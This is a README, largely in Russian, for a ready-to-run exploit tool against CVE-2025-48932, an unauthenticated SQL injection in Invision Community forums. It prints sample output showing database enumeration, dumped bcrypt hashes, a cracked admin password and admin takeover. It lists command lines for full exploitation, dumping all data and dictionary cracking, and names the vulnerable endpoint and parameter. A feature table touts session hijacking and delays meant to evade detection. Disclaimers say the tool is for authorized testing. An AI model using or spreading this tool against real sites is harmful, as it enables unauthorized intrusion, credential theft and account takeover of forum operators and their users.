
CVE-2025-48932 - Unauthenticated SQL injection exploit for Invision Community ≤ 4.7.20. Fully automated exploitation with database enumeration, credential dumping, admin takeover, session hijacking & multi-threading. No dependencies required. Security research tool by Sudeepa Wanigarathna
CVE-2025-48932 — это критическая неаутентифицированная слепая SQL-инъекция, обнаруженная в Invision Community версиях ≤ 4.7.20. Этот эксплойт позволяет удалённым злоумышленникам:
$ python3 exploit.py -u https://vulnerable-site.com -v
╔══════════════════════════════════════════════════════════════════╗
║ CVE-2025-48932 - Invision Community SQL Injection ║
║ Author: Sudeepa Wanigarathna ║
║ Critical: Unauthenticated Remote Code Execution ║
╚══════════════════════════════════════════════════════════════════╝
[*] Target: https://vulnerable-site.com
[*] Performing vulnerability assessment...
[+] Target is confirmed VULNERABLE!
[*] Enumerating database information...
[+] Database Information:
Version: 10.4.32-MariaDB
User: invision@localhost
Database: invision_community
Hostname: localhost
Basedir: /usr/
Datadir: /var/lib/mysql/
[*] Enumerating databases...
[+] Found 5 databases
Found: information_schema
Found: invision_community
Found: mysql
Found: performance_schema
Found: phpmyadmin
[*] Enumerating tables in invision_community...
[+] Found 12 tables
Found: core_members
Found: core_sessions
Found: admin_members
Found: cms_categories
Found: forums_posts
...
[*] Searching for credentials...
[+] Found credential table: core_members
Credentials: admin - $2y$10$abcdefghijklmnopqrstuvwxyz...
Credentials: moderator - $2y$10$1234567890abcdefghijklmnop...
Credentials: user123 - $2y$10$qwertyuiopasdfghjklzxcvbnm...
[*] Extracting admin information...
[+] Admin Information Found:
name: admin
email: [email protected]
id: 1
password_hash: $2y$10$abcdefghijklmnopqrstuvwxyz...
[*] Attempting to crack password hash...
[+] Detected hash type: bcrypt
[+] Password cracked: Admin@2024!
[*] Attempting admin bypass...
[+] Admin login successful!
[+] Credentials: admin:Admin@2024!
[+] Exploitation complete!
[+] Report saved to invision_exploit_report_1700000000.json
{
"target": "https://vulnerable-site.com",
"timestamp": "2026-08-02T12:34:56.789Z",
"vulnerable": true,
"database": {
"version": "10.4.32-MariaDB",
"user": "invision@localhost",
"database": "invision_community",
"hostname": "localhost"
},
"databases": [
"information_schema",
"invision_community",
"mysql",
"performance_schema",
"phpmyadmin"
],
"tables": [
"core_members",
"core_sessions",
"admin_members"
],
"credentials": [
{
"username": "admin",
"password_hash": "$2y$10$abcdefghijklmnopqrstuvwxyz...",
"email": "[email protected]"
}
],
"admin_info": {
"name": "admin",
"email": "[email protected]",
"id": "1",
"password_hash": "$2y$10$abcdefghijklmnopqrstuvwxyz..."
},
"summary": {
"total_databases": 5,
"total_tables": 12,
"total_credentials": 3,
"vulnerable": true,
"successful": true
}
}
# Клонируйте репозиторий
git clone https://github.com/CerberusMrXi/CVE-2025-48932-Invision-Community-SQLi-Exploit.git
cd CVE-2025-48932-Invision-Community-SQLi-Exploit
# Устанавливать зависимости не нужно! Просто запустите.
# Проверка, уязвима ли цель
python3 exploit.py -u https://example.com --check-only
# Полная эксплуатация с подробным выводом
python3 exploit.py -u https://example.com -v
# С прокси (Burp Suite)
python3 exploit.py -u https://example.com -p http://127.0.0.1:8080 -v
# Сохранение результатов в пользовательский файл
python3 exploit.py -u https://example.com -o results.json
# Многопоточное извлечение (быстрее)
python3 exploit.py -u https://example.com -t 10
# Выгрузка всех доступных данных
python3 exploit.py -u https://example.com --dump-all
# С пользовательским словарём для взлома паролей
python3 exploit.py -u https://example.com --wordlist rockyou.txt -v
# Тихий режим (без вывода, только отчёт)
python3 exploit.py -u https://example.com -o silent_report.json
# Режим отладки с подробными ошибками
python3 exploit.py -u https://example.com -v --debug
✅ Без внешних зависимостей!
✅ Только чистая стандартная библиотека Python!
✅ Не нужны pip install или виртуальное окружение!
# Загрузите популярный словарь
wget https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt
/applications/calendar/modules/front/calendar/view.phpIPS\calendar\modules\front\calendar\view::search()location (ввод, предоставленный пользователем)GET /applications/calendar/modules/front/calendar/view.php?do=search&location=[SQL_INJECTION_PAYLOAD]
Этот инструмент предназначен ТОЛЬКО для ОБРАЗОВАТЕЛЬНЫХ целей и АВТОРИЗОВАННОГО тестирования.
Используя этот инструмент, вы соглашаетесь:
Несанкционированный доступ к компьютерным системам является незаконным и неэтичным.
invision_exploit_report_[timestamp].json
├── target # Целевой URL
├── timestamp # Время выполнения эксплойта
├── vulnerable # Статус уязвимости
├── database # Информация о базе данных
├── databases # Список баз данных
├── tables # Список таблиц
├── credentials # Извлечённые учётные данные
├── admin_info # Информация об учётной записи администратора
└── summary # Сводка эксплуатации
Проблема: Истекло время ожидания соединения
# Решение: увеличьте время ожидания или проверьте сеть
python3 exploit.py -u https://example.com --timeout 60
Проблема: Ошибки SSL-сертификата
# Решение: отключите проверку SSL (не рекомендуется для продакшена)
python3 exploit.py -u https://example.com --no-verify-ssl
Проблема: Обнаружено ограничение частоты запросов
# Решение: уменьшите количество потоков и увеличьте задержки
python3 exploit.py -u https://example.com -t 2 --delay 2
Проблема: Уязвимый параметр не найден
# Решение: убедитесь, что приложение calendar установлено и включена функция GeoLocation
# Проверка: существует ли файл /applications/calendar/modules/front/calendar/view.php
Мы приветствуем ваш вклад! Пожалуйста, ознакомьтесь с нашими Рекомендациями по участию в разработке.
git checkout -b feature/AmazingFeature)git commit -m 'Add some AmazingFeature')git push origin feature/AmazingFeature)Исследователь безопасности и багбаунти-хантер
Этот проект распространяется под лицензией MIT — подробности см. в файле LICENSE.
MIT License
Copyright (c) 2026 Sudeepa Wanigarathna
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
Если этот проект помог вам или показался вам интересным:
Исследователь в области кибербезопасности | Инженер-программист | CTF-инженер
Этот проект предоставляется для исследований в области безопасности, защитного анализа и авторизованного тестирования на проникновение. Пользователи несут ответственность за соблюдение всех применимых законов и получение надлежащего разрешения перед использованием.
| Возможность | Описание | Статус |
|---|
| 🚀 Ноль зависимостей | Чистая стандартная библиотека Python — не требуется pip install | ✅ |
| ⚡ Многопоточность | Молниеносное извлечение данных с настраиваемым количеством потоков | ✅ |
| 🤖 Полная автоматизация | Полная цепочка эксплуатации: от обнаружения до формирования отчёта | ✅ |
| 👑 Захват администратора | Перехват сессий и повышение привилегий | ✅ |
| 🔑 Извлечение учётных данных | Извлечение пользователей, хэшей паролей, email-адресов | ✅ |
| 🔓 Взлом паролей | Встроенный подбор хэшей с поддержкой словарей | ✅ |
| 📋 Отчёты в JSON | Структурированный вывод для анализа и документации | ✅ |
| 🔌 Поддержка прокси | Интеграция с Burp Suite и пользовательскими прокси | ✅ |
| 🎨 Цветной вывод | Красивое оформление вывода в терминале с индикаторами прогресса | ✅ |
| 🛡️ Ограничение скорости | Встроенные задержки для предотвращения обнаружения | ✅ |
| Аргумент | Описание | Пример |
|---|
-u, --url | Целевой URL (обязательно) | -u https://example.com |
-p, --proxy | URL прокси | -p http://127.0.0.1:8080 |
-t, --threads | Количество потоков (по умолчанию: 5) | -t 10 |
-o, --output | Файл для вывода результатов | -o results.json |
-v, --verbose | Включить подробный вывод | -v |
--check-only | Только проверить уязвимость | --check-only |
--dump-all | Выгрузить все доступные данные | --dump-all |
--wordlist | Файл словаря для взлома паролей | --wordlist rockyou.txt |